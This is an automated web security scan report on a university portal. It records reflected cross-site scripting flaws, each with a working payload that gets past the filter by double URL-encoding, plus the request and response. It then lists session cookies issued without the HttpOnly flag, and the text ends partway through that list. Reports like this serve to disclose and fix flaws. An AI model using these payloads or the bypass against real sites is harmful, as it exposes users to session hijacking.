Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organization. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organization which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organization in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:

Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitized.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

1.1. https://my.champlain.edu/feedback/allwidgets [REST URL parameter 2] next

Summary

Severity:	High
Confidence:	Certain
Host:	https://my.champlain.edu
Path:	/feedback/allwidgets

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 98d24%2527%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6f1a2b2b1ac was submitted in the REST URL parameter 2. This input was echoed as 98d24'><script>alert(1)</script>6f1a2b2b1ac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /feedback/allwidgets98d24%2527%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6f1a2b2b1ac HTTP/1.1
Host: my.champlain.edu
Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.63 Safari/535.7
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: https://my.champlain.edu/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=4d7d8kkrde4u52l2mku6s2ma91; SaveStateCookie=root
Content-Length: 10

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.12
X-Powered-By: ASP.NET
Date: Mon, 26 Dec 2011 01:52:21 GMT
Content-Length: 761

<div style="display:none;">IE Hack</div>
<div dojoType="dijit.layout.ContentPane">
   <script type="dojo/method">
   var self;
   if (typeof(window.portal) != 'undefined')
       self = window.portal.da
...[SNIP]...
<div id='allwidgets98d24'><script>alert(1)</script>6f1a2b2b1aca'>
...[SNIP]...

1.2. https://my.champlain.edu/feedback/allwidgets [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://my.champlain.edu
Path:	/feedback/allwidgets

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cb2af%2527%253balert%25281%2529%252f%252f6fd3b5f9ce7 was submitted in the REST URL parameter 2. This input was echoed as cb2af';alert(1)//6fd3b5f9ce7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /feedback/allwidgetscb2af%2527%253balert%25281%2529%252f%252f6fd3b5f9ce7 HTTP/1.1
Host: my.champlain.edu
Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.63 Safari/535.7
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: https://my.champlain.edu/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=4d7d8kkrde4u52l2mku6s2ma91; SaveStateCookie=root
Content-Length: 10

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.12
X-Powered-By: ASP.NET
Date: Mon, 26 Dec 2011 01:52:41 GMT
Content-Length: 716

<div style="display:none;">IE Hack</div>
<div dojoType="dijit.layout.ContentPane">
   <script type="dojo/method">
   var self;
   if (typeof(window.portal) != 'undefined')
       self = window.portal.dashboard.getWidgetById('feedback');
       dojo.require("dijit.Editor");
   dojo.addOnLoad(function() {
       dojo.byId('allwidgetscb2af';alert(1)//6fd3b5f9ce7a').innerHTML = window.portal.dashboard.getWidgetById('allwidgetscb2af';alert(1)//6fd3b5f9ce7').getDescription();
           });
   </script>
...[SNIP]...

1.3. https://my.champlain.edu/feedback/allwidgets98d24%2527%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6f1a2b2b1ac [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://my.champlain.edu
Path:	/feedback/allwidgets98d24%2527%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6f1a2b2b1ac

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2470c%2527%253balert%25281%2529%252f%252ff8f6e992b5c was submitted in the REST URL parameter 2. This input was echoed as 2470c';alert(1)//f8f6e992b5c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /feedback/2470c%2527%253balert%25281%2529%252f%252ff8f6e992b5c HTTP/1.1
Host: my.champlain.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.12
Set-Cookie: PHPSESSID=ts8h3mj3jahr2fikvlqq4k2253; path=/; secure
X-Powered-By: ASP.NET
Date: Mon, 26 Dec 2011 02:00:51 GMT
Connection: close
Content-Length: 686

<div style="display:none;">IE Hack</div>
<div dojoType="dijit.layout.ContentPane">
   <script type="dojo/method">
   var self;
   if (typeof(window.portal) != 'undefined')
       self = window.portal.dashboard.getWidgetById('feedback');
       dojo.require("dijit.Editor");
   dojo.addOnLoad(function() {
       dojo.byId('2470c';alert(1)//f8f6e992b5ca').innerHTML = window.portal.dashboard.getWidgetById('2470c';alert(1)//f8f6e992b5c').getDescription();
           });
   </script>
...[SNIP]...

1.4. https://my.champlain.edu/feedback/allwidgets98d24%2527%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6f1a2b2b1ac [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://my.champlain.edu
Path:	/feedback/allwidgets98d24%2527%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6f1a2b2b1ac

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9ba99%2527%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3a5c3714217 was submitted in the REST URL parameter 2. This input was echoed as 9ba99'><script>alert(1)</script>3a5c3714217 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /feedback/9ba99%2527%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3a5c3714217 HTTP/1.1
Host: my.champlain.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.12
Set-Cookie: PHPSESSID=4rfig9b5rv4vnivu9skh85boe0; path=/; secure
X-Powered-By: ASP.NET
Date: Mon, 26 Dec 2011 02:00:49 GMT
Connection: close
Content-Length: 731

<div style="display:none;">IE Hack</div>
<div dojoType="dijit.layout.ContentPane">
   <script type="dojo/method">
   var self;
   if (typeof(window.portal) != 'undefined')
       self = window.portal.da
...[SNIP]...
<div id='9ba99'><script>alert(1)</script>3a5c3714217a'>
...[SNIP]...

1.5. https://my.champlain.edu/feedback/allwidgets98d24%2527%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6f1a2b2b1ac [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://my.champlain.edu
Path:	/feedback/allwidgets98d24%2527%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6f1a2b2b1ac

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a3466%2527%253balert%25281%2529%252f%252f4cf1b0c991071f538 was submitted in the REST URL parameter 2. This input was echoed as a3466';alert(1)//4cf1b0c991071f538 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Remediation detail

Request

GET /feedback/a3466%2527%253balert%25281%2529%252f%252f4cf1b0c991071f538?renderableItem=%2Fshow%2F30 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Cookie: mycc_ss=2
Host: my.champlain.edu
Connection: Keep-Alive
Cache-Control: no-cache
Accept-Language: en-US

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.12
Set-Cookie: PHPSESSID=c73lda2kt7dvdfvrh6ugdjs0l0; path=/; secure
X-Powered-By: ASP.NET
Date: Mon, 26 Dec 2011 01:54:20 GMT
Content-Length: 704

<div style="display:none;">IE Hack</div>
<div dojoType="dijit.layout.ContentPane">
   <script type="dojo/method">
   var self;
   if (typeof(window.portal) != 'undefined')
       self = window.portal.dashboard.getWidgetById('feedback');
       dojo.require("dijit.Editor");
   dojo.addOnLoad(function() {
       dojo.byId('a3466';alert(1)//4cf1b0c991071f538a').innerHTML = window.portal.dashboard.getWidgetById('a3466';alert(1)//4cf1b0c991071f538').getDescription();
           });
   </script>
...[SNIP]...

1.6. https://my.champlain.edu/feedback/allwidgets98d24%2527%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6f1a2b2b1ac [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://my.champlain.edu
Path:	/feedback/allwidgets98d24%2527%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6f1a2b2b1ac

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ac116%2527%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6eeb31382e83e5fcb was submitted in the REST URL parameter 2. This input was echoed as ac116'><script>alert(1)</script>6eeb31382e83e5fcb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Remediation detail

Request

GET /feedback/ac116%2527%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6eeb31382e83e5fcb?renderableItem=%2Fshow%2F30 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Cookie: mycc_ss=2
Host: my.champlain.edu
Connection: Keep-Alive
Cache-Control: no-cache
Accept-Language: en-US

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.12
Set-Cookie: PHPSESSID=sjn145h8ccv3juiltq27bl7n45; path=/; secure
X-Powered-By: ASP.NET
Date: Mon, 26 Dec 2011 01:54:13 GMT
Content-Length: 749

<div style="display:none;">IE Hack</div>
<div dojoType="dijit.layout.ContentPane">
   <script type="dojo/method">
   var self;
   if (typeof(window.portal) != 'undefined')
       self = window.portal.da
...[SNIP]...
<div id='ac116'><script>alert(1)</script>6eeb31382e83e5fcba'>
...[SNIP]...

1.7. https://my.champlain.edu/feedback/allwidgets98d24%2527%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253e6f1a2b2b1ac [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://my.champlain.edu
Path:	/feedback/allwidgets98d24%2527%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253e6f1a2b2b1ac

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 218d0%2527%253balert%25281%2529%252f%252ff984687d3bb1121b2 was submitted in the REST URL parameter 2. This input was echoed as 218d0';alert(1)//f984687d3bb1121b2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Remediation detail

Request

GET /feedback/218d0%2527%253balert%25281%2529%252f%252ff984687d3bb1121b2?renderableItem=%2Fshow%2F38 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Cookie: mycc_ss=2
Host: my.champlain.edu
Connection: Keep-Alive
Cache-Control: no-cache
Accept-Language: en-US

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.12
Set-Cookie: PHPSESSID=4uge8suiga06nppl1dolfp7685; path=/; secure
X-Powered-By: ASP.NET
Date: Mon, 26 Dec 2011 14:38:40 GMT
Content-Length: 704

<div style="display:none;">IE Hack</div>
<div dojoType="dijit.layout.ContentPane">
   <script type="dojo/method">
   var self;
   if (typeof(window.portal) != 'undefined')
       self = window.portal.dashboard.getWidgetById('feedback');
       dojo.require("dijit.Editor");
   dojo.addOnLoad(function() {
       dojo.byId('218d0';alert(1)//f984687d3bb1121b2a').innerHTML = window.portal.dashboard.getWidgetById('218d0';alert(1)//f984687d3bb1121b2').getDescription();
           });
   </script>
...[SNIP]...

1.8. https://my.champlain.edu/feedback/allwidgets98d24%2527%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253e6f1a2b2b1ac [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://my.champlain.edu
Path:	/feedback/allwidgets98d24%2527%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253e6f1a2b2b1ac

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 74e68%2527%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9b3e9004114cb2389 was submitted in the REST URL parameter 2. This input was echoed as 74e68'><script>alert(1)</script>9b3e9004114cb2389 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Remediation detail

Request

GET /feedback/74e68%2527%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9b3e9004114cb2389?renderableItem=%2Fshow%2F38 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Cookie: mycc_ss=2
Host: my.champlain.edu
Connection: Keep-Alive
Cache-Control: no-cache
Accept-Language: en-US

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.12
Set-Cookie: PHPSESSID=bkq9fusebmj05fs4fmt2364d94; path=/; secure
X-Powered-By: ASP.NET
Date: Mon, 26 Dec 2011 14:38:34 GMT
Content-Length: 749

<div style="display:none;">IE Hack</div>
<div dojoType="dijit.layout.ContentPane">
   <script type="dojo/method">
   var self;
   if (typeof(window.portal) != 'undefined')
       self = window.portal.da
...[SNIP]...
<div id='74e68'><script>alert(1)</script>9b3e9004114cb2389a'>
...[SNIP]...

2. Cookie without HttpOnly flag set previous next
There are 24 instances of this issue:

/
/Page_Form_Misc_Bulletinboard/longdescription/id/{ID}
/Site-Map.html
/advising/curriculum/
/attendance/verification
/auth/login
/clearinghouse/launch
/course/selection
/feedback/allwidgets98d24%2527%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6f1a2b2b1ac
/feedback/allwidgets98d24%2527%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253e6f1a2b2b1ac
/index/index/forceload/true
/open/secure/group/facstaff/dir0/hr/file/Benefits_Enrollment_Guide.pdf
/page_hr_benefitsdocuments
/page_search/search/type/people/query/{QUERY}
/public/advising/pdfs/Spring
/public/advising/pdfs/Spring%202008%20Final%20Exam%20Schedule%20by%20Instructor.pdf
/public/advising/pdfs/Spring%202008%20Final%20Exam%20Schedule%20by%20Subject.pdf
/public/human_resources/pandemic_form/
/store_widgetstore
/widget_campusdir/download
/widget_webadvisor/launch/page/webadvisor
/x1501.xml
/xhr/dird
/xhr/dirp

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

2.1. https://my.champlain.edu/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://my.champlain.edu
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=4d7d8kkrde4u52l2mku6s2ma91; path=/; secure

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: my.champlain.edu
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://search.champlain.edu/favicon.ico5aaab%3Ca%3E726a1d76ac7?xss=9
Content-Length: 10

Response

2.2. https://my.champlain.edu/Page_Form_Misc_Bulletinboard/longdescription/id/{ID} previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://my.champlain.edu
Path:	/Page_Form_Misc_Bulletinboard/longdescription/id/{ID}

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=bsccle2apnkfivci9ps9cb45i6; path=/; secure

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Page_Form_Misc_Bulletinboard/longdescription/id/{ID} HTTP/1.1
Host: my.champlain.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

2.3. https://my.champlain.edu/Site-Map.html previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://my.champlain.edu
Path:	/Site-Map.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=22e31ie4h9fn7p50t4rjvonna5; path=/; secure

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Site-Map.html HTTP/1.1
Host: my.champlain.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.12
Set-Cookie: PHPSESSID=22e31ie4h9fn7p50t4rjvonna5; path=/; secure
X-Powered-By: ASP.NET
Date: Mon, 26 Dec 2011 02:00:23 GMT
Connection: close
Content-Length: 1229

<!DOCTYPE html>
<html lang="en">
<head>



<meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

2.4. https://my.champlain.edu/advising/curriculum/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://my.champlain.edu
Path:	/advising/curriculum/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=atvqqu6pjm1g5vfm796ruait51; path=/; secure

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /advising/curriculum/ HTTP/1.1
Host: my.champlain.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

2.5. https://my.champlain.edu/attendance/verification previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://my.champlain.edu
Path:	/attendance/verification

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=9f5r01ae59sl8o0c0r3fgokq51; path=/; secure

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /attendance/verification HTTP/1.1
Host: my.champlain.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Location: https://my.champlain.edu/page_authrequired
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.12
Set-Cookie: PHPSESSID=9f5r01ae59sl8o0c0r3fgokq51; path=/; secure
X-Powered-By: ASP.NET
Date: Mon, 26 Dec 2011 02:00:36 GMT
Connection: close
Content-Length: 165

<head><title>Document Moved</title></head>
<body><h1>Object Moved</h1>This document may be found <a HREF="https://my.champlain.edu/page_authrequired">here</a></body>

2.6. https://my.champlain.edu/auth/login previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://my.champlain.edu
Path:	/auth/login

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=7iqu5o5djjvh2amo14fitl21r0; path=/; secure

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /auth/login HTTP/1.1
Host: my.champlain.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Location: https://my.champlain.edu/
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.12
Set-Cookie: PHPSESSID=7iqu5o5djjvh2amo14fitl21r0; path=/; secure
X-Powered-By: ASP.NET
Date: Mon, 26 Dec 2011 02:00:26 GMT
Connection: close
Content-Length: 148

<head><title>Document Moved</title></head>
<body><h1>Object Moved</h1>This document may be found <a HREF="https://my.champlain.edu/">here</a></body>

2.7. https://my.champlain.edu/clearinghouse/launch previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://my.champlain.edu
Path:	/clearinghouse/launch

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=4kjfqb0ag5v92urbaqd84rr093; path=/; secure

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /clearinghouse/launch HTTP/1.1
Host: my.champlain.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Location: https://my.champlain.edu/page_authrequired
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.12
Set-Cookie: PHPSESSID=4kjfqb0ag5v92urbaqd84rr093; path=/; secure
X-Powered-By: ASP.NET
Date: Mon, 26 Dec 2011 02:00:34 GMT
Connection: close
Content-Length: 165

<head><title>Document Moved</title></head>
<body><h1>Object Moved</h1>This document may be found <a HREF="https://my.champlain.edu/page_authrequired">here</a></body>

2.8. https://my.champlain.edu/course/selection previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://my.champlain.edu
Path:	/course/selection

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=is33p11vuc6ok9upl5sgh5la80; path=/; secure

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /course/selection HTTP/1.1
Host: my.champlain.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Location: https://my.champlain.edu/page_authrequired
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.12
Set-Cookie: PHPSESSID=is33p11vuc6ok9upl5sgh5la80; path=/; secure
X-Powered-By: ASP.NET
Date: Mon, 26 Dec 2011 02:00:23 GMT
Connection: close
Content-Length: 165

<head><title>Document Moved</title></head>
<body><h1>Object Moved</h1>This document may be found <a HREF="https://my.champlain.edu/page_authrequired">here</a></body>

2.9. https://my.champlain.edu/feedback/allwidgets98d24%2527%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6f1a2b2b1ac previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://my.champlain.edu
